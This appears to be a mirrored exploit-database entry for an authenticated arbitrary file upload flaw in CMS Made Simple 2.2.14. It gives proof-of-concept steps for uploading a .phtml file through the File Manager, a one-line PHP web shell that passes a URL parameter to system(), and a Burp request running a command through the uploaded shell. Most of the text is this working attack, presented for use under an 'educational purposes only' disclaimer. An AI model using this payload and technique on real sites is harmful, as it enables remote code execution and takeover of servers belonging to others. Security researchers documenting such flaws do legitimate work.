Exploits / Vulnerability Discovered : 2020-08-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Cms made simple 2.2.14 authenticated arbitrary file upload is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2020-07-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: N/A
1. Description:
----------------------
CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.
2. Proof of Concept:
----------------------
- Create .phtml or .ptar file with malicious PHP payload;
- Upload .phtml or .ptar file in the 'File Manager' module;
- Click on the uploaded file to perform remote code execution.
3: Example payload:
----------------------
<?php system($_GET['cmd']);?>
4a: Burp request:
----------------------
GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
Host: 10.10.10.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close